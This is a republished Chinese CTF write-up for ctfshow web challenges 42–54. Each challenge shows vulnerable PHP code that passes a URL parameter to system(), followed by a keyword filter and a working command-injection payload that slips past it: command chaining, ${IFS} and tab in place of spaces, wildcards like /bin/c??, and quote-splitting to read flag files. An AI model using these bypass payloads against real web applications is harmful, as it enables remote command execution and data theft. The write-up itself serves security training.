0


【CTFWP】ctfshow-web42-52

文章目录


web42

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c." >/dev/null 2>&1");
}else{
    highlight_file(__FILE__);
}

题目分析:

这段 PHP 脚本是一个简单的 web shell,它允许通过 URL 参数

c

执行系统命令。如果

c

参数被设置,脚本将使用

system()

函数执行传入的命令,并将输出重定向到

/dev/null

,这意味着命令的输出将被丢弃,不会显示给用户。如果

c

参数没有被设置,脚本将使用

highlight_file()

函数高亮显示当前脚本文件的内容。

这里是脚本的逐行解释:

  1. <?php:这是 PHP 代码的开始标记。
  2. if(isset($_GET['c'])){:检查 URL 中是否有 c 参数。
  3. $c=$_GET['c'];:如果存在 c 参数,将其值赋给变量 $c
  4. system($c." >/dev/null 2>&1");:执行变量 $c 中的命令,并重定向标准输出和标准错误输出到 /dev/null
  5. }else{:如果 c 参数不存在,执行下面的代码块。
  6. highlight_file(__FILE__);:显示当前脚本文件的内容,并高亮显示 PHP 代码。
  7. }:结束 else 代码块。
  8. ?>:这是 PHP 代码的结束标记。
system($c." >/dev/null 2>&1");

具体解释

在 PHP 中,

system()

函数用于执行一个命令并输出结果。这个函数的典型用法是:

system($command,&$output);

其中

$command

是要执行的命令字符串,

$output

是一个变量,用于存储命令的输出。

在代码片段中:

system($c." >/dev/null 2>&1");

这行代码执行了以下操作:

  1. $c 是从 URL 参数 c 获取的值。这意味着如果有人访问这个脚本并提供了一个 c 参数,比如 c=ls,那么 $c 的值将是 ls
  2. $c." >/dev/null 2>&1"$c 与重定向操作符连接起来。这里的重定向操作符有两个部分:- >/dev/null:这将命令的标准输出(stdout)重定向到 /dev/null,这是一个特殊的文件,用于丢弃所有写入到它的数据。这相当于在命令行中使用 >/dev/null。- 2>&1:这将命令的标准错误(stderr)重定向到标准输出(stdout)。由于标准输出已经被重定向到 /dev/null,因此标准错误也会被丢弃。
  3. system() 函数执行由 $c 和重定向操作符组成的命令串。由于使用了重定向,命令的输出和错误都不会显示在浏览器中,也不会保存在任何地方。

举例说明

假设有如下的 URL 访问:

http://example.com/script.php?c=ls

在这个例子中,

$c

的值将是

ls

,所以

system()

函数将执行以下命令:

ls>/dev/null 2>&1

这将在服务器上列出当前目录的内容,但由于使用了重定向,这些内容不会被显示给用户,也不会保存在任何地方。

黑洞(/dev/null)

解释:

在 Unix 和类 Unix 系统中,

/dev/null

是一个特殊的文件,它被称为“黑洞”,因为它会丢弃所有写入它的数据。这相当于一个数据的“下水道”,任何发送到

/dev/null

的数据都会被永久删除,不会有任何输出。

以下是一些关于

/dev/null

的说明:

  1. 丢弃数据:当你执行一个命令,并将输出重定向到 /dev/null,比如 command > /dev/null,这意味着命令的输出将不会被显示或保存。
  2. 安静运行:如果一个命令会产生大量输出,但你不需要这些输出,你可以使用 /dev/null 来让命令“安静”地运行。
  3. 错误处理:除了重定向标准输出到 /dev/null,你还可以将标准错误重定向到同一个地方,使用 2>&1 > /dev/null。这样,命令的错误信息也会被丢弃。
  4. 日志记录:在某些情况下,你可能想要运行一个脚本或程序,但又不希望它生成日志文件。通过将输出重定向到 /dev/null,你可以避免生成日志。
  5. 测试:在开发和测试过程中,如果输出不是必需的,使用 /dev/null 可以简化测试过程,专注于其他方面。
  6. 安全性:虽然 /dev/null 本身不涉及安全性问题,但使用它来丢弃可能包含敏感信息的输出可以避免潜在的安全风险。
  7. 环境变量:在 shell 脚本中,/dev/null 有时被用作环境变量,以确保命令不会影响输出。
  8. 系统调用:在编程中,/dev/null 可以作为系统调用的目标,比如在 C 语言中使用 open("/dev/null", "w") 打开一个文件描述符,用于写入数据。

总之,

/dev/null

是一个用于丢弃数据的特殊文件,它在 Unix 和类 Unix 系统中广泛使用,以简化命令行操作和提高脚本的灵活性。

payload:

?c=tac flag.php;ls

payload解释:

采用双写绕过

?c=tac flag.php;ls

这里呢,是把分号后面的

ls

写到黑洞里面去了,第一个

tac

就逃出来了

flag:

ctfshow{505e7f24-823d-4dd4-96f1-2edcdcc4877a}

web43

<?phpif(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat/i",$c)){system($c." >/dev/null 2>&1");}}else{highlight_file(__FILE__);}

题目解析:

  • 这个相比上题,过滤了分号
  • 除了分号,还可以用&&
  • 要url编码后使用 %26%26

payload:

?c=tac flag.php%26%26ls

flag:

ctfshow{3ff43859-a599-4f16-bcb4-957d4c22a578}

web44

<?phpif(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/;|cat|flag/i",$c)){system($c." >/dev/null 2>&1");}}else{highlight_file(__FILE__);}

题目解析:

  • 这题多过滤了flag
  • 可以使用通配符绕过
  • 通配符有*``````?

payload:

?c=tac fl?g.php%26%26ls
?c=tac fl*g.php%26%26ls

flag:

ctfshow{ad1f49da-357e-4b25-98ff-3fc1a0f48820}

web45

<?phpif(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| /i",$c)){system($c." >/dev/null 2>&1");}}else{highlight_file(__FILE__);}

题目解析:

  • 多过滤了空格,url编码的空格也被过滤了
  • 如果过滤了空格,可以使用:<>%20(space)%09(tab)

payload:

?c=tac%09fla?.php%26%26ls

flag:

ctfshow{750bf5e9-71c6-4bf8-beb4-b026c0570fbc}

web46

<?phpif(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i",$c)){system($c." >/dev/null 2>&1");}}else{highlight_file(__FILE__);}

题目解析:

  • 对比上一题,把数字也过滤了,还有$*这两个符号

payload:

?c=tac%09fla?.php%26%26ls

flag:

ctfshow{9b5a8f1e-f342-40f4-b6a8-81d777d0c9ba}

web47

<?phpif(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i",$c)){system($c." >/dev/null 2>&1");}}else{highlight_file(__FILE__);}

题目解析:

  • 多过滤了几个查看文件的命令
  • Linux查看文件命令:cattacmorelessheadtailnltailf

payload:

?c=tac%09fla?.php%26%26ls

flag:ctfshow{37269e44-8e76-485c-a966-54a52da88cfd}

web48

<?phpif(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i",$c)){system($c." >/dev/null 2>&1");}}else{highlight_file(__FILE__);}

题目解析:

  • 又多过滤了几个读取文件的命令

payload:

?c=tac%09fla?.php%26%26ls

flag:

ctfshow{570f034a-31d9-4a80-91f6-bc761734dabe}

web49

<?phpif(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i",$c)){system($c." >/dev/null 2>&1");}}else{highlight_file(__FILE__);}

题目解析:

  • 多过滤了%
  • %09%会被解析成制表符,不算做%

payload:

?c=tac%09fla?.php%26%26ls

flag:

ctfshow{233ec2aa-440f-48dc-8548-9689626fc10d}

web50

<?phpif(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i",$c)){system($c." >/dev/null 2>&1");}}else{highlight_file(__FILE__);}

题目解析:

  • 这个把09和26过滤了,之前的方法就不可以了。得想新不用空格的方法了
  • 使用nl带行号?c=nl<flag.php||ls- nl 命令nl 是一个用于添加行号到文本文件的命令。它通常用于给文本文件的每一行添加行号,以便于引用和阅读。- 重定向< 是一个输入重定向操作符,它允许将文件的内容作为命令的输入。
  • 把||进行url编码%7C%7C
  • flag绕过是采用中间加两个单引号,两个单引号分割字符串执行的时候会被忽略

payload:

?c=nl<fla''g.php%7C%7Cls

flag:

按F12查看

ctfshow{f6ef33bf-57ea-4e5d-aa1f-726595652bf6}

web51

<?phpif(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i",$c)){system($c." >/dev/null 2>&1");}}else{highlight_file(__FILE__);}

题目解析:

  • 多过滤了一个tac

payload:

?c=nl<fla''g.php%7C%7Cls

flag:

ctfshow{0581c93f-a53f-44d4-8d74-83397bfc7b96}

web52

<?phpif(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i",$c)){system($c." >/dev/null 2>&1");}}else{highlight_file(__FILE__);}

题目解析:

  • 这个把<>也过滤了,上面的方法是不行了,但是把$符号放出来了
  • 空格就可以使用$IFS$9$IFS${IFS} 来绕过了

payload:

?c=nl${IFS}fla''g.php%7C%7Cls

回显:

$flag="flag_here";

查看根目录文件

?c=ls${IFS}/%7C%7Cls

回显:bin dev etc flag home lib media mnt opt proc root run sbin srv sys tmp usr var

ls -l

查看flag详细信息

?c=ls${IFS}-l${IFS}/%7C%7Cls

回显:flag drwxr-xr-x

查看flag文件

?c=nl${IFS}/fla''g%7C%7Cls

flag:

ctfshow{3123e5da-6eb9-44e6-a309-117bb87aba88}

web53

<?phpif(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i",$c)){echo($c);$d=system($c);echo"<br>".$d;}else{echo'no';}}else{highlight_file(__FILE__);}

题目解析:

  • echo($c);是输出GET传入的参数
  • $d = system($c);是执行c的语句后得到的东西赋值给d
  • echo "<br>".$d;是换行后在输出d的内容
  • echo 'no';是if判断错误的话会输出no

payload:

先查看一下目录

?c=ls${IFS}

回显:

ls${IFS}flag.php index.php readflag
readflag

直接查看flag.php

?c=nl${IFS}fla''g.php

回显:flag

flag:

ctfshow{d2bc773c-85e5-44cb-b04b-eabc11b12d58}

web54

<?phpif(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\`|\%|\x09|\x26|\>|\</i",$c)){system($c);}}else{highlight_file(__FILE__);}

题目解析:

  • 完全禁用了这些命令
  • 对flag.php的构造可以这样:fl??.??? 甚至可以简化为:???????? 同样,命令也可以进行构造 cat可以构造为?atc??

payload:

这里的/bin/是指bin目录下检索c??,不然在当前目录是没有这个命令的

?c=/bin/c??${IFS}????????

另外grep命令可以才文件中查找含有的字符串 形式:grep [字符串] [filename]

?c=grep${IFS}ctfshow${IFS}????????

重命名文件也可以

?c=mv${IFS}fl??.???${IFS}a.txt

访问a.txt即可

flag:

ctfshow{f5404f94-7a53-46ee-9153-f9132349bb47}



本文转载自: https://blog.csdn.net/LongL_GuYu/article/details/140837762
版权归原作者 Long._.L 所有, 如有侵权,请联系我们删除。

“【CTFWP】ctfshow-web42-52”的评论:

还没有评论